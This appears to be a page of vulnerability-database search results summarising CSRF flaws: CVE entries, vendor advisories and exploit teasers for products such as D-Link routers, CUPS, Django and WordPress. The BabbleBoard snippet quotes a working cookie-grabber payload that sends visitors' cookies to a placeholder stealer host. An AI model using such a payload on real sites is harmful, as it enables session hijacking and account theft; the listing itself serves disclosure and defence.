1836 matches found
D-Link CAPTCHA Bypass
D-Link Captcha Partially Broken May 12th, 2009 Hack-A-Day reported on D-Link’s new captcha system designed to protect against malware that alters DNS settings by logging in to the router using default administrative credentials. I downloaded the new firmware onto our DIR-628 to take a look, and...
doop CMS 1.4.0b - Cross-Site Request Forgery Arbitrary File Upload
doop CMS 1.4.0b - Cross-Site Request Forgery Arbitrary File Upload -------------------------------------------------------------------------- | Project: Doop document.admin.submit ---------------------------------------------------------------------- -- Upload Shell -- Ok. Una volta nel pannello ...
BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber
BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF + Discovered By SirGod + Greetz : All my friends + Cookie Grabber Exploit - Steal the cookie of any visitor. 1.Register as : document.location ="http://yourdomain/path/stealer.php?cookie=" + document.cookie; Everyone who visit the index page will be...
PT-2008-6327 · Apple · Cups
Name of the Vulnerable Software and Affected Versions: CUPS versions prior to 1.3.8 Description: The issue allows remote attackers to bypass intended policy and conduct CSRF attacks via the add and cancel RSS subscription functions in the web interface. This occurs because the web interface uses...
CVE-2008-3909
The administration application in Django 0.91, 0.95, and 0.96 stores unauthenticated HTTP POST requests and processes them after successful authentication occurs, which allows remote attackers to conduct cross-site request forgery CSRF attacks and delete or modify data via unspecified requests...
CSRF: don't underestimate my damage and ability to attack-vulnerability warning-the black bar safety net
Author: iceskysl Source: IceskYsl@1sters! CSRF, this attack way, although proposed a long time in the 2 0 0 6 time of year there, but this sleepy attack the giants until recently only gradually into our line of sight, what is CSRF what is that harm in the end how much? Common use is the How to,...
Liferay Portal fails to protect against CSRF
Overview Liferay Portal fails to properly protect against Cross-Site Request Forgery CSRF. This may allow a remote attacker to be able to forge requests that Liferay Portal takes action upon. Description Liferay Portal is an enterprise portal solution that uses Java technologies. Liferay Portal...
Critical: Red Hat Security Advisory: seamonkey security update
Updated seamonkey packages that fix several security issues are now available for Red Hat Enterprise Linux 2.1, 3, and 4. This update has been rated as having critical security impact by the Red Hat Security Response Team. SeaMonkey is an open source Web browser, advanced email and newsgroup...
Axis 207W Wireless Camera Web Interface - Multiple Vulnerabilities
http://airscanner.com/security/07080701axis.htm Airscanner Mobile Security Advisory 07080101: Axis 207W Multiple Vulnerabilities Product: AXIS 207W Platform: NA Requirements: AXIS 207W Camera on WLAN/LAN Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com May 30, 2007 Risk...
CVE-2007-3787
The eSoft InstaGate EX2 UTM device does not require entry of the old password when changing the admin password, which might allow remote attackers to gain privileges by conducting a CSRF attack, making a password change from an unattended workstation, or other attacks...
CVE-2007-3787
The eSoft InstaGate EX2 UTM device does not require entry of the old password when changing the admin password, which might allow remote attackers to gain privileges by conducting a CSRF attack, making a password change from an unattended workstation, or other attacks...
CVE-2007-3457
Adobe Flash Player 8.0.34.0 and earlier insufficiently validates HTTP Referer headers, which might allow remote attackers to conduct a CSRF attack via a crafted SWF file...
Cross site request forgery (csrf)
Adobe Flash Player 8.0.34.0 and earlier insufficiently validates HTTP Referer headers, which might allow remote attackers to conduct a CSRF attack via a crafted SWF file...
CVE-2007-3457
Adobe Flash Player 8.0.34.0 and earlier insufficiently validates HTTP Referer headers, which might allow remote attackers to conduct a CSRF attack via a crafted SWF file...
CVE-2007-3464
Check Point SofaWare Safe@Office, with firmware before Embedded NGX 7.0.45 GA, does not require entry of the old password when changing the admin password, which might allow attackers to gain privileges by conducting a CSRF attack, making a password change on an unattended workstation, or other...
Cross site scripting
Cross-site scripting XSS vulnerability in the CSRF protection scheme in WordPress before 2.0.6 allows remote attackers to inject arbitrary web script or HTML via a CSRF attack with an invalid token and quote characters or HTML tags in URL variable names, which are not properly handled when...